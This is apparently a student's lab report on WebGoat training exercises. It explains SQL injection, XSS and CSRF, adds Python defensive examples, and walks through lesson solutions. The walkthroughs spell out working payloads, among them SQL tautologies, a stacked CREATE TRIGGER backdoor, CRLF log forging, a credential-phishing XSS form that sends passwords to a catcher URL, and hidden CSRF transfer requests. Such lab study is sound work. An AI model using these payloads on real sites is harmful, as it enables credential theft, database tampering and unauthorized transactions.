2018-2019-2 20165333 "Network Warfare Technology" Exp 9: Web Security Basics

I. Basic questions

1. SQL injection attack: what is the principle, and how is it defended against?

  • Principle: SQL injection means inserting SQL commands into a web form field, a query string or a page request so that the server is tricked into executing malicious SQL.
    The attack exploits a design flaw: the application builds its SQL statements dynamically from user input without validating that input, and the resulting statement runs on the target server's database. For example, typing special characters such as ', --, or # into the username or password box closes the quoted string and comments out the rest of the SQL statement, so the login check passes without any genuine login information.
  • Defense:
    turn off or remove unnecessary interactive form-submission pages;
    filter keywords in the code around the injection point (for example with regular expressions) and standardise secure coding practice;
    do not leave backup files on the server, where they may be infected or contain their own vulnerabilities and become an entry point;
    encrypt the contents of the database so that leaked data carries no direct meaning.
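The report's list of defenses is about filtering and hardening; the standard fix a developer applies is to stop building SQL from strings altogether. As an added example (not code from the original report or from WebGoat), the Python script below runs the same lookup two ways against a small in-memory SQLite table: once by concatenating the input into the statement, once with a bound parameter. The user_data table shape and its rows are constructed for the example; the input `Smith' or '1'='1` is the tautology used in the String SQL Injection lesson later in this report.

```python
import sqlite3

# Constructed sample rows standing in for WebGoat's user_data table (an assumption
# about the table's shape; only last_name matters for the query).
SAMPLE_ROWS = [
    (101, "Smith", "John"),
    (102, "Doe", "Jane"),
    (103, "Plane", "Joe"),
]


def make_db():
    """Build an in-memory SQLite database holding the sample user_data table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user_data (userid INTEGER, last_name TEXT, first_name TEXT)"
    )
    conn.executemany("INSERT INTO user_data VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, last_name):
    """The defect: user input is pasted into the SQL text. A quote in the input
    terminates the string literal, and everything after it is parsed as SQL."""
    sql = (
        "SELECT userid, last_name FROM user_data WHERE last_name = '"
        + last_name
        + "'"
    )
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, last_name):
    """The fix: the value is bound as a parameter, so the SQL text never changes
    and a quote inside the input is just one more character of the value."""
    sql = "SELECT userid, last_name FROM user_data WHERE last_name = ?"
    return conn.execute(sql, (last_name,)).fetchall()


def compare(last_name):
    """Run both lookups on a fresh database; returns (vulnerable_rows, safe_rows)."""
    conn = make_db()
    try:
        return lookup_vulnerable(conn, last_name), lookup_parameterized(conn, last_name)
    finally:
        conn.close()


if __name__ == "__main__":
    # Ordinary input: both queries agree.
    print(compare("Smith"))
    # The tautology from the String SQL Injection lesson: the concatenated query
    # returns every row, the parameterized one returns none (no such last name).
    print(compare("Smith' or '1'='1"))
```

With the bound parameter the database never sees `or '1'='1` as SQL, which is why keyword filtering becomes a secondary defense rather than the only one.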

2. XSS attack: what is the principle, and how is it defended against?
  • Principle: XSS stands for cross-site scripting. The attacker exploits a vulnerable site (usually one that does not filter user input properly) so that attacker-supplied HTML or JavaScript is displayed on a page and affects the site's other users. Because the victim's browser trusts the target server, the malicious script injected into the page (an HTML tag or JavaScript code) runs when the victim visits it, which lets the attacker obtain the user's cookie and carry out illegal operations under the user's identity.
  • Defense:
    from the user's perspective: raise awareness and do not enter personal information such as a username and password on untrusted pages;
    from the web author's perspective:
    filter input parameters and URLs;
    encode or escape potentially dangerous characters before outputting data.
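The second developer-side defense, encoding at output time, is easy to get wrong by encoding for the wrong context. As an added example (not code from the original report or from WebGoat), the Python below renders a message page with and without encoding, and shows the three contexts that matter for the lessons in this report: element content (the Stored XSS lesson), an attribute value, and a URL parameter (the Reflected XSS lesson). The page template, the `q` parameter name and the audit helper are assumptions made for the example; the payload string is the one entered in the Stored XSS lesson below.

```python
import html
from urllib.parse import urlencode

# Payload from the Stored XSS lesson in this report, used here only as test input.
STORED_XSS_PAYLOAD = '<script>alert("boy next door");</script>'


def render_message_unsafe(title, body):
    """The defect: untrusted text goes straight into the HTML, so a <script>
    tag stored in a message runs in every reader's browser."""
    return "<h3>" + title + "</h3>\n<p>" + body + "</p>"


def render_message(title, body):
    """The fix for element content: HTML-encode each untrusted value at output
    time, so <, >, &, " and ' reach the browser as text rather than markup."""
    return (
        "<h3>" + html.escape(title, quote=True) + "</h3>\n"
        "<p>" + html.escape(body, quote=True) + "</p>"
    )


def attribute_value(value):
    """Encoding for the attribute context: always quote the value and escape the
    quotes inside it, so the input cannot close the attribute and start a new one."""
    return '"' + html.escape(value, quote=True) + '"'


def search_link(base, query):
    """Encoding for the URL context: percent-encode the parameter so a reflected
    search term cannot carry markup into the page that echoes it."""
    return base + "?" + urlencode({"q": query})


def contains_raw_script(rendered):
    """Simple audit helper (a check on output, not an input filter): does the
    rendered HTML still contain an unencoded <script tag?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_message_unsafe("title", STORED_XSS_PAYLOAD))
    print(render_message("title", STORED_XSS_PAYLOAD))
    print(search_link("/WebGoat/search", "<b>x</b>"))
```

Note that `html.escape` is the right tool only for the HTML element and attribute contexts; a value placed inside a URL needs percent-encoding, and a value placed inside a script block needs a JavaScript-specific encoder, which is why the function is chosen per output location.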

3. CSRF attack: what is the principle, and how is it defended against?
  • Principle:
    CSRF stands for cross-site request forgery.
    CSRF is a forged login. The essence of a cross-site forged request is stealing the user's session or cookie. Since sessions are currently kept mainly in cookies, the attacker does not care about the victim's actual account and password: once the user has logged in, the session is the only proof of identity, and whoever obtains the session can pose as the victim to the server.
    Typically, the user enters a username and password at site A; after validation, site A generates cookie information and returns it, the user is now logged in to A and can send requests to A normally. Before logging out of site A, the user visits another site B, which may return attack code that requests access to site A, so a request made at site B's prompting is sent to site A. Site A cannot tell that the request is malicious, so it executes the malicious code.
  • Defense:
    verify a request token;
    verify the Referer;
    add a verification code;
    set the cookie domain.
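The first two defenses in that list are both needed, because a forged request planted in a message on the same site (as in the CSRF lesson later in this report) carries a same-site Referer and passes a Referer check on its own. As an added example (not code from the original report or from WebGoat), the Python below implements a transfer handler that checks a per-session token in constant time and then the Origin/Referer, and shows the cookie attributes that keep the session off cross-site requests. The host value, the `transferFunds` parameter handling, the session dictionary and the JSESSIONID cookie name are assumptions made for the example.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumption: the application is served from this host, as in the WebGoat setup
# used in the report.
SITE_HOST = "localhost:8080"


def issue_csrf_token(session):
    """Create a random token once per session and keep it server-side; the
    server embeds the same value in every state-changing form it renders."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def hidden_token_field(session):
    """The hidden input a legitimate transfer form carries."""
    return '<input type="hidden" name="csrf_token" value="%s">' % issue_csrf_token(session)


def origin_is_ours(headers):
    """Referer/Origin check: a state-changing request must come from our own
    pages. Requests with neither header are refused rather than trusted."""
    source = headers.get("Origin") or headers.get("Referer")
    return bool(source) and urlsplit(source).netloc == SITE_HOST


def token_matches(session, supplied):
    """Constant-time comparison of the submitted token with the session's copy."""
    expected = session.get("csrf_token")
    if not expected:
        return False
    return hmac.compare_digest(expected.encode(), supplied.encode())


def handle_transfer(session, params, headers):
    """Server-side handler for transferFunds. Only a request that carries the
    session's token and originates from this site is executed."""
    if not token_matches(session, params.get("csrf_token", "")):
        return "rejected: missing or wrong CSRF token"
    if not origin_is_ours(headers):
        return "rejected: foreign Origin/Referer"
    return "transferred " + params["transferFunds"]


def session_cookie(value):
    """Set-Cookie attributes for the session cookie (cookie name assumed):
    SameSite=Lax keeps it off cross-site embedded requests such as <img> loads."""
    return "Set-Cookie: JSESSIONID=%s; Path=/WebGoat; HttpOnly; SameSite=Lax" % value


if __name__ == "__main__":
    victim = {}
    token = issue_csrf_token(victim)
    print(handle_transfer(victim, {"csrf_token": token, "transferFunds": "5000"},
                          {"Origin": "http://localhost:8080"}))
    # A hidden <img> request: same-site Referer, but no token in the request.
    print(handle_transfer(victim, {"transferFunds": "5000"},
                          {"Referer": "http://localhost:8080/WebGoat/attack"}))
```

The token is what stops the embedded-image request: the browser attaches the cookie automatically, but it cannot read the hidden field out of the victim's form, so the forged request arrives without it.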

II. Practice

(A) Installing WebGoat
1. Download the file webgoat-container-7.0.1-war-exec.jar
2. In the directory containing the file, run java -jar webgoat-container-7.0.1-war-exec.jar to start WebGoat. The message Starting ProtocolHandler ["http-bio-8080"] indicates success; the terminal must not be closed during the experiment
3. Enter http://localhost:8080/WebGoat in the browser to reach the WebGoat login screen
4. Log in with the default username and password guest

SQL attacks

  • 1. Numeric SQL Injection
    Right-click the page, choose Inspect Element to view and edit the page source, and append or 1=1 to the value of the selected city number:

The attack succeeds and the weather for all cities is displayed:

  • 2. Log Spoofing
    Use a carriage return (%0d) and a line feed (%0a): enter zch%0d%0aLogin Succeeded for username: admin as the username, and the attack succeeds:
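The lesson works because the log writer copies the username into the file unchanged, so the encoded CR LF starts a second, forged line. As an added example (not code from the original report or from WebGoat), the Python below shows the defensive side: a log sanitizer that makes control characters visible instead of writing them, the resulting one-line entry for the lesson's input, and an audit check that flags existing values containing control characters. The log line format and function names are assumptions made for the example; the input string is the one submitted in the lesson.

```python
import re
from urllib.parse import unquote

# The username submitted in the Log Spoofing lesson of this report, URL-encoded
# exactly as it was typed into the form.
SPOOF_INPUT = "zch%0d%0aLogin Succeeded for username: admin"

# Every ASCII control character, including CR (0x0d) and LF (0x0a).
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def sanitize_for_log(value):
    """Replace control characters with a visible escape (\\x0d, \\x0a, ...) so
    user input can never start a new line in the log file."""
    return CONTROL_CHARS.sub(lambda m: "\\x%02x" % ord(m.group(0)), value)


def login_failed_entry_unsafe(username):
    """The defect: the raw username is written into the log line."""
    return "Login failed for username: " + username


def login_failed_entry(username):
    """The fix: sanitize before the value reaches the log."""
    return "Login failed for username: " + sanitize_for_log(username)


def line_count(entry):
    """How many log lines an entry occupies once written."""
    return len(entry.splitlines())


def has_control_chars(value):
    """Audit check for existing log data: flag values that contain control
    characters, a sign that someone tried to forge entries."""
    return CONTROL_CHARS.search(value) is not None


if __name__ == "__main__":
    username = unquote(SPOOF_INPUT)       # what the server sees after URL decoding
    print(repr(login_failed_entry_unsafe(username)))  # two lines: the forged one looks real
    print(repr(login_failed_entry(username)))         # one line, escapes visible
```

Sanitizing at the log boundary rather than at the form is deliberate: the same username can reach the log from several code paths, and the escape makes the attempt itself visible to whoever reads the file.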

  • 3. String SQL Injection
    Enter Smith as the task requires. The related records are shown, and the statement is SELECT * FROM user_data WHERE last_name = 'Smith'

Then inject the tautology ' or '1'='1 and the attack succeeds:

  • 4. LAB: SQL Injection
    Stage 1: String SQL Injection:
    Entering or 1=1 -- as the injection fails; the page source reveals a length limit on the input, and after editing the source the injection succeeds.

  • 5. Database Backdoors
    First test the statement: enter 101; update employee set salary = 5000 as the user ID, and the updated data can be seen

Then implant 101; CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='[email protected]' WHERE userid = NEW.userid to create a back door:
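Both steps of this lesson depend on the server running every statement it is handed, so the defense is twofold: a lookup that binds a validated id and executes a single statement, and an inventory of the database's triggers so a planted one is noticed. As an added example (not code from the original report or from WebGoat), the Python below does both against an in-memory SQLite database. The employee table and its rows are constructed; the trigger input is modelled on the report's payload but carries the END terminator SQLite requires and a constructed e-mail address; the vulnerable lookup uses `executescript` as a stand-in for any driver that accepts stacked statements.

```python
import sqlite3

# Constructed stand-in for WebGoat's employee table.
EMPLOYEES = [
    (101, "john@example.test", 3000),
    (102, "jane@example.test", 3200),
]

# Stacked-query input modelled on the report's CREATE TRIGGER payload, with the
# END terminator SQLite requires and a constructed e-mail address.
BACKDOOR_INPUT = (
    "101; CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW "
    "BEGIN UPDATE employee SET email = 'backdoor@example.test' "
    "WHERE userid = NEW.userid; END"
)


def make_employee_db():
    """In-memory database with the sample employee table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE employee (userid INTEGER PRIMARY KEY, email TEXT, salary INTEGER)"
    )
    conn.executemany("INSERT INTO employee VALUES (?, ?, ?)", EMPLOYEES)
    return conn


def get_employee_vulnerable(conn, user_id):
    """The defect: the id is pasted into the SQL text and executescript() runs
    every statement it finds, so a stacked CREATE TRIGGER is executed as well."""
    conn.executescript("SELECT * FROM employee WHERE userid = " + user_id)


def get_employee_safe(conn, user_id):
    """The fix: validate the id, bind it as a parameter, and use execute(),
    which runs exactly one statement (sqlite3 refuses stacked statements there)."""
    if not user_id.isdigit():
        raise ValueError("user id must be a number")
    return conn.execute(
        "SELECT userid, email, salary FROM employee WHERE userid = ?", (int(user_id),)
    ).fetchall()


def list_triggers(conn):
    """Inventory of triggers defined in the database, read from the schema catalogue."""
    rows = conn.execute("SELECT name FROM sqlite_master WHERE type = 'trigger'")
    return [row[0] for row in rows]


def unexpected_triggers(conn, allowlist=()):
    """Audit: names of triggers that are not on the allowlist of known ones."""
    return [name for name in list_triggers(conn) if name not in allowlist]


if __name__ == "__main__":
    conn = make_employee_db()
    print(get_employee_safe(conn, "101"))
    print("triggers before:", unexpected_triggers(conn))
    get_employee_vulnerable(conn, BACKDOOR_INPUT)
    print("triggers after:", unexpected_triggers(conn))
```

The trigger inventory is the detection half: a back door of this kind survives application restarts and password changes, so a periodic comparison of the catalogue against the triggers the schema is supposed to contain is what reveals it.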

XSS attacks

  • 1. Phishing with XSS
    Type the XSS attack code directly into the search box. Following the reference material, add a form that asks the user for a username and password and then sends that information to the site and displays it:
</form>
<script>
    function hack(){ 
        XSSImage=new Image;
        XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
        alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
    } 
</script>
<form name="phish">
<br>
<br>
<HR>
    <H2>This feature requires account login:</H2>
<br>
    <br>Enter Username:<br>
    <input type="text" name="user">
    <br>Enter Password:<br>
    <input type="password" name="pass">
<br>
    <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>

Click Search; a form appears, enter the information, and the attack succeeds:

  • 2. Stored XSS Attacks
    Create illegal message content that causes unintended pages or other content to load when users view it: in the title, enter a string of JS code in the message: <script>alert("boy next door");</script>. Clicking on the post just created shows a pop-up window

  • 3. Reflected XSS Attacks
    When wrong user information is entered, the server checks it, finds the mistake, and returns an error whose content is shown on the error page. If an attack URL is entered, it is returned in that information. Enter it and submit:

CSRF attacks

  • 1. Cross Site Request Forgery (CSRF)
    Write a URL into the Message box as a hidden image that other users cannot see; once a user clicks the message, the CSRF event is triggered. In Message, enter <img src="http://localhost:8080/WebGoat/attack?Screen=&menu=900&transferFunds=5000" width="1" height="1" />; when a user clicks the message, the page loads and displays it, and the user performs the fund transfer without knowing.

  • 2. CSRF Prompt By-Pass
    In the Message box, enter:
<iframe src="attack?Screen=[scr]menu=[menu]&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=[scr]&menu=[menu]&transferFunds=CONFIRM"> </iframe>

View the message; the transfer news is shown:


Source: www.cnblogs.com/challengeeverthing/p/10927046.html